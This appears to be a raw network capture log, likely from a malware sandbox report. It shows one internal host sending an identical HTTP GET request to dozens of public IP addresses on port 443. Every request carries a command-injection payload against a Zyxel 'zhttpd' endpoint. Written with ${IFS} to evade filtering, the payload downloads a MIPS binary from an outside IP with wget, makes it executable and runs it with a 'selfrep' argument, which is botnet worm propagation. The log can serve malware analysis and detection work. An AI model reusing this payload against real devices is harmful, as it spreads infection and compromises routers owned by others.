                                                        Feb 2, 2024 06:21:02.788522005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2657192.168.2.1444044131.43.158.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788552046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2658192.168.2.1436262191.245.222.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788578033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2659192.168.2.1438506210.97.49.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788628101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2660192.168.2.14479328.113.161.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788651943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2661192.168.2.1444208208.71.32.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788707018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2662192.168.2.1449516128.195.23.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788724899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2663192.168.2.145437042.128.79.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788779020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2664192.168.2.1435050156.55.222.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788791895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2665192.168.2.1445492191.16.46.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788856983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2666192.168.2.1442420169.58.53.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788892984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2667192.168.2.144535473.66.144.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788942099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2668192.168.2.1433684107.4.124.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788988113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2669192.168.2.143872271.58.245.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789025068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2670192.168.2.1436874163.0.42.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789072037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2671192.168.2.145151847.81.4.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789124012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2672192.168.2.1435588114.254.130.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789442062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2673192.168.2.1448744182.249.140.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789468050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2674192.168.2.1443232147.127.129.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789505005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2675192.168.2.1456938187.37.188.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789525986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2676192.168.2.1434768116.115.237.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789577007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2677192.168.2.1434766106.64.203.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789625883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2678192.168.2.1458592172.225.57.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789671898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2679192.168.2.144177860.164.43.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789706945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2680192.168.2.144438468.18.15.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789756060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2681192.168.2.144321831.42.144.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789769888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2682192.168.2.144645625.114.61.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789820910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2683192.168.2.143488064.31.202.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789839029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2684192.168.2.145300272.123.32.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789895058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2685192.168.2.1438208117.206.210.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789935112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2686192.168.2.144684862.95.210.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789964914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2687192.168.2.143300417.52.64.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.789989948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2688192.168.2.1437016124.10.83.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790014029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2689192.168.2.145626274.118.32.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790077925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2690192.168.2.1436558206.221.33.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790129900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2691192.168.2.1458330141.85.234.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790158033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2692192.168.2.1459336199.198.24.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790193081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2693192.168.2.1450512216.124.247.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790240049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2694192.168.2.1451102160.178.17.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790268898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2695192.168.2.143304093.62.30.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790302992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2696192.168.2.1455584140.109.102.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790357113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2697192.168.2.1453802125.29.43.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790406942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2698192.168.2.1443202128.242.25.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790452957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2699192.168.2.145962250.9.245.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790508032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2700192.168.2.1437098202.26.51.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790550947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2701192.168.2.143894298.139.120.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790601015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2702192.168.2.1446234116.91.66.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790638924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2703192.168.2.145890054.53.19.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790694952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2704192.168.2.145442458.237.148.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790724993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2705192.168.2.144052872.59.126.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790781975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2706192.168.2.1456084212.52.33.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790806055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2707192.168.2.144616868.153.166.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790828943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2708192.168.2.1455478179.114.97.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790885925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2709192.168.2.1434886203.124.129.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790931940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2710192.168.2.1443562160.216.168.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.790972948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2711192.168.2.143445831.28.66.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791018009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2712192.168.2.1460480190.149.122.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791034937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2713192.168.2.1458472134.240.228.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791075945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2714192.168.2.1438724220.67.61.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791134119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2715192.168.2.1447456133.102.28.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791166067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2716192.168.2.1442046221.125.139.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791198969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2717192.168.2.14331602.7.181.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791240931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2718192.168.2.1453148102.87.168.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.791305065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2719192.168.2.1441164201.20.187.236443
                                                        TimestampBytes transferredDirectionData
